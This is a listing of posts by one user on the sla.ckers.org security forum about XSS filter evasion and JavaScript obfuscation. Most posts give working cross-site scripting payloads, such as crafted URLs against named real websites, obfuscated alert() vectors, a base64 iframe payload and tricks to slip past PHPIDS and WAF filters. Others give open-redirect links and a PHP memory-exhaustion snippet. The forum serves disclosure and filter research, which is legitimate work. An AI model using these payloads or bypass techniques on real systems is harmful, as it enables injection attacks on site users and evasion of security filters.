sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 2
Results 1 - 30 of 38
6 years ago
C1c4Tr1Z
@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)
Forum: Projects
6 years ago
C1c4Tr1Z
@.mario: Yeah, I think that was the problem, because I was testing this vector from p42.us:
a=alert,a(0)
I was playing with something like this, but its impact is 35. :D
a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0)
bye!
Forum: Projects
6 years ago
C1c4Tr1Z
I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize:
a>>/al/+/ert/|a(0)
Thanks! EDIT: This vector doesn't seem to work! My browser is crazy :).
Forum: Projects
5 years ago
C1c4Tr1Z
Browser Security Handbook: http://code.google.com/p/browsersec/
Google doctype's Web Security section: http://code.google.com/p/doctype/wiki/ArticlesXSS
Forum: Obfuscation
5 years ago
C1c4Tr1Z
concat() also works: ({}=[].concat)()[0] == window
Forum: XSS Info
5 years ago
C1c4Tr1Z
Well, at least it's secure..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
jojo! nice magicmac. MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') " We love sarcasm.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)// I had to bypass something like this (;|+\(.*\))+ PS: Upss! It's McAfee SECURE!
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
And, Kodak:
http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22
http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss
@euronymous: http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
Thanks DoctorDan! I'll read it. I've found this also: http://applesoup.googlepages.com/bypass_filter.txt
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
This is something weird..
hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all
Tested on FF 3.0.3 (UTF-8)
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
@Kyo: mmm... that's weird. Because if you look at the source code, you will see that the syntax is correct.
Forum: XSS Info
6 years ago
C1c4Tr1Z
FF3 Unix: http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=%22);%0Aa=alert,a(%22XSS
Forum: XSS Info
6 years ago
C1c4Tr1Z
I think that maybe WebScarab or the Burp suite have more features.
Forum: XSS Info
6 years ago
C1c4Tr1Z
I have only found some XSS, but with POST requests. But if you are searching for bugs, there's a nice SQL Injection..
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I fuzzed the browser with UTF-7 and the only char that seems to give me a valid javascript execution is char 43.
Forum: XSS Info
6 years ago
C1c4Tr1Z
Just more easy functions:
with(b={})if((b.c=function(){return'ale'})&&(b.a=function(){return'rt'}))eval(b.c()+b.a())(0);
a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1),a(0)
Tell me if one of them doesn't work :S
Forum: XSS Info
6 years ago
C1c4Tr1Z
Maybe just the whitelist, because a blacklist must be updated very often.
Forum: XSS Info
6 years ago
C1c4Tr1Z
Here, realpath() and other functions appear in this advisory of Hardened-PHP: http://www.hardened-php.net/advisory_012004.42.html
Forum: Projects
6 years ago
C1c4Tr1Z
Here are three functions that you might like: realpath(), stream_set_write_buffer(), is_writable() && is_readable()
Forum: Projects
6 years ago
C1c4Tr1Z
I was thinking in memory allocation or off-by-one exploits. For example: <?php /*PHP 4 < 4.4.5 and PHP 5 < 5.2.1*/ str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); ?>
Forum: Projects
6 years ago
C1c4Tr1Z
id Wrote:
> Ummmmm....they did let him, they just happened to fix it later.

Ohh, sorry.
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I've found that if you put something like this in the URI with Greasemonkey installed, the addon starts "Fetching user script": {;}.user.js And it seems that makes an infinite loop. Then, in the same tab/window, you write: http://www.foo.com/bar.user.js Greasemonkey recognizes the HTML source as a plugin for this addon, instead sending the normal "Error loading user scr
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
I don't think that Yahoo! has no sense of security and let you inject so easy JS code. :S
Forum: Full Disclosure
6 years ago
C1c4Tr1Z
Here's one, it's very simple but I didn't read it in the thread: <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>
Forum: XSS Info
6 years ago
C1c4Tr1Z
Another aol redirection: http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/
Forum: Full Disclosure